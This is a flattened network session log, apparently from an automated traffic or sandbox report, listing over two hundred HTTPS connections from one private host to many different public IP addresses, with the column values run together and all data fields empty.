                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13884192.168.2.1457162157.2.19.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13885192.168.2.1434400136.103.228.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13886192.168.2.145025047.27.54.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13887192.168.2.143747480.34.207.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13888192.168.2.143813252.214.27.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13889192.168.2.144567678.102.244.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13890192.168.2.1447322130.200.149.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13891192.168.2.1450972217.215.239.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13892192.168.2.1460236195.110.75.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13893192.168.2.1455506132.76.246.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13894192.168.2.143594087.14.132.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13895192.168.2.143510261.86.25.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13896192.168.2.1454436119.157.29.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13897192.168.2.143893867.255.51.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13898192.168.2.1445654149.163.190.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13899192.168.2.145625225.96.120.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13900192.168.2.1441768140.167.66.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13901192.168.2.1433522103.241.130.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13902192.168.2.1453526163.255.208.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13903192.168.2.1437778168.187.224.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13904192.168.2.145936882.203.98.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13905192.168.2.1450170174.208.53.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13906192.168.2.1459152134.14.86.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13907192.168.2.1459748209.46.235.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13908192.168.2.1437026178.63.218.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13909192.168.2.1453070165.92.174.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13910192.168.2.1439002223.25.139.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13911192.168.2.1436412102.91.94.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13912192.168.2.1455284151.89.174.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13913192.168.2.1444386222.254.143.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13914192.168.2.1460474133.172.247.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13915192.168.2.1435540132.206.230.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13916192.168.2.144882892.156.182.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13917192.168.2.144171686.146.99.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13918192.168.2.145742647.21.112.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13919192.168.2.1433362180.0.160.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13920192.168.2.1443500111.123.95.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13921192.168.2.145592497.163.108.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13922192.168.2.145862858.99.123.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13923192.168.2.1455056102.38.22.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13924192.168.2.1451688103.251.199.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13925192.168.2.143783049.56.10.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13926192.168.2.1454628132.165.132.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13927192.168.2.145042657.189.123.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13928192.168.2.1443412212.220.225.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13929192.168.2.1442610135.128.191.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13930192.168.2.1455380124.108.85.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13931192.168.2.1443498200.64.110.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13932192.168.2.1453092174.62.119.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13933192.168.2.1447914170.192.141.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13934192.168.2.1451182197.11.82.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13935192.168.2.145405667.231.106.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13936192.168.2.1458096198.70.105.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13937192.168.2.144722068.103.202.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13938192.168.2.1436268222.36.98.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13939192.168.2.144927032.33.51.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13940192.168.2.143417871.178.110.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13941192.168.2.1455620151.160.143.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13942192.168.2.1439190146.37.116.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13943192.168.2.1439762209.9.190.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13944192.168.2.1435372184.181.95.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13945192.168.2.144570447.53.117.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13946192.168.2.145842437.202.255.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13947192.168.2.1449800173.184.2.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13948192.168.2.1456670152.66.166.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13949192.168.2.1434538161.244.59.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13950192.168.2.1439770120.91.162.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13951192.168.2.1458698104.134.204.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13952192.168.2.1450794181.13.14.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13953192.168.2.143954859.154.138.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13954192.168.2.1457820180.181.159.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13955192.168.2.1438838193.15.112.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13956192.168.2.1454442189.27.144.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13957192.168.2.1458688155.165.132.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13958192.168.2.145164645.15.234.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13959192.168.2.1457184186.216.255.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13960192.168.2.1436074174.226.156.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13961192.168.2.1452248191.217.17.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13962192.168.2.1449384190.187.127.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13963192.168.2.1437994161.44.194.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13964192.168.2.144078244.137.162.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13965192.168.2.1450246148.233.165.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13966192.168.2.144390619.240.130.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13967192.168.2.144299440.27.108.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13968192.168.2.1439276185.234.166.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13969192.168.2.1445374175.0.108.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13970192.168.2.1446656213.222.111.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13971192.168.2.1453000102.241.156.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13972192.168.2.1440686201.196.186.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13973192.168.2.145501085.67.121.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13974192.168.2.1457090131.205.96.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13975192.168.2.1433790173.247.68.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13976192.168.2.1458308167.25.107.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13977192.168.2.1454308152.223.49.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13978192.168.2.1446366101.185.239.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13979192.168.2.1459010145.140.185.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13980192.168.2.1451488161.181.110.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13981192.168.2.145706419.238.234.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13982192.168.2.1437660223.185.10.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13983192.168.2.145525682.60.236.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13984192.168.2.143433295.36.186.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13985192.168.2.1434624167.2.41.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13986192.168.2.1439664186.95.235.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13987192.168.2.1451864103.161.245.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13988192.168.2.1444654145.188.133.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13989192.168.2.1457188179.18.20.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13990192.168.2.1458456146.69.101.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13991192.168.2.1448338124.123.213.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13992192.168.2.145355050.214.131.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13993192.168.2.1451592100.177.179.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13994192.168.2.1436008148.35.161.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13995192.168.2.1459228109.236.30.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13996192.168.2.1452192129.240.104.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13997192.168.2.1445262131.40.50.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13998192.168.2.1444408142.163.235.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13999192.168.2.1434590185.36.189.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14000192.168.2.1457460105.182.224.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14001192.168.2.145625643.83.232.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14002192.168.2.144898679.113.108.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14003192.168.2.144600013.217.21.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14004192.168.2.145890235.129.52.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14005192.168.2.1443190194.242.86.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14006192.168.2.144562417.123.77.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14007192.168.2.1460410153.236.54.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14008192.168.2.1457316189.74.41.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14009192.168.2.1460130162.208.214.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14010192.168.2.143395038.101.26.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14011192.168.2.144711458.92.66.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14012192.168.2.1456246197.126.182.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14013192.168.2.1437254146.196.162.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14014192.168.2.1435518167.152.214.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14015192.168.2.145030889.117.36.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14016192.168.2.1446660130.51.18.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14017192.168.2.1457580108.1.89.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14018192.168.2.145138687.63.139.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14019192.168.2.145028492.50.31.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14020192.168.2.145089866.229.44.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14021192.168.2.1433262110.196.180.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14022192.168.2.144929267.137.11.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14023192.168.2.145529676.107.107.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14024192.168.2.1443476161.122.63.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14025192.168.2.1438350101.123.116.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14026192.168.2.1455522217.151.78.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14027192.168.2.145784831.195.187.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14028192.168.2.144947254.79.89.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14029192.168.2.1436632177.245.136.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14030192.168.2.14523244.141.173.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14031192.168.2.1456886133.121.77.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14032192.168.2.145658412.243.38.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14033192.168.2.1457814187.176.226.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14034192.168.2.145047219.191.212.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14035192.168.2.1457828112.251.108.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14036192.168.2.1448726117.1.166.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14037192.168.2.1458512221.94.221.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14038192.168.2.1434890150.223.45.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14039192.168.2.145949276.113.107.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14040192.168.2.1452862158.10.68.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14041192.168.2.145052686.2.141.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14042192.168.2.1438678160.139.162.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14043192.168.2.1441898191.202.40.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14044192.168.2.1432818218.80.231.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14045192.168.2.1433910199.168.220.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14046192.168.2.1444408128.233.188.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14047192.168.2.1437480134.230.114.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14048192.168.2.1442148149.237.58.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14049192.168.2.144330488.99.134.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14050192.168.2.1459758142.47.121.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14051192.168.2.1440250134.237.129.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14052192.168.2.144634466.250.112.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14053192.168.2.1436662172.171.191.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14054192.168.2.143646832.25.92.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14055192.168.2.143502412.11.17.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14056192.168.2.1456460145.173.164.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14057192.168.2.1457428175.107.100.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14058192.168.2.145262089.175.102.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14059192.168.2.1445866104.4.72.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14060192.168.2.145743051.78.160.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14061192.168.2.145668827.31.203.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14062192.168.2.1447530128.50.210.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14063192.168.2.1435536179.251.29.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14064192.168.2.144878043.23.93.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14065192.168.2.1459042115.114.221.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14066192.168.2.1448982136.51.160.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14067192.168.2.145029037.186.106.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14068192.168.2.1436428101.64.42.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14069192.168.2.1452380175.108.219.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14070192.168.2.143936252.65.205.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14071192.168.2.1446560105.143.211.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14072192.168.2.1434648144.138.150.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14073192.168.2.1458396122.40.140.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14074192.168.2.143623693.191.85.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14075192.168.2.145161472.195.203.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14076192.168.2.1446956121.240.193.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14077192.168.2.1447888123.23.116.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14078192.168.2.1450136110.97.171.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14079192.168.2.1445186125.185.191.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14080192.168.2.1444124199.138.108.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14081192.168.2.1444982202.50.216.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14082192.168.2.1458484179.73.183.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14083192.168.2.1441030222.90.116.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14084192.168.2.1447154118.157.146.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14085192.168.2.1460404139.18.228.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14086192.168.2.143379680.64.130.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14087192.168.2.143999047.246.225.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14088192.168.2.1451738142.215.25.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14089192.168.2.1447516141.172.252.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14090192.168.2.143920269.235.100.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14091192.168.2.1444482182.181.188.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14092192.168.2.1454482130.29.60.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14093192.168.2.1435662165.93.55.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14094192.168.2.144545097.106.234.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14095192.168.2.1443564142.170.232.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14096192.168.2.144844882.55.140.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14097192.168.2.145150888.193.10.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14098192.168.2.144596664.208.171.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14099192.168.2.1456490163.226.3.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14100192.168.2.144157819.21.6.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14101192.168.2.1460184177.215.118.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14102192.168.2.1440596178.185.90.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14103192.168.2.1435016187.65.33.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14104192.168.2.145963017.76.174.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
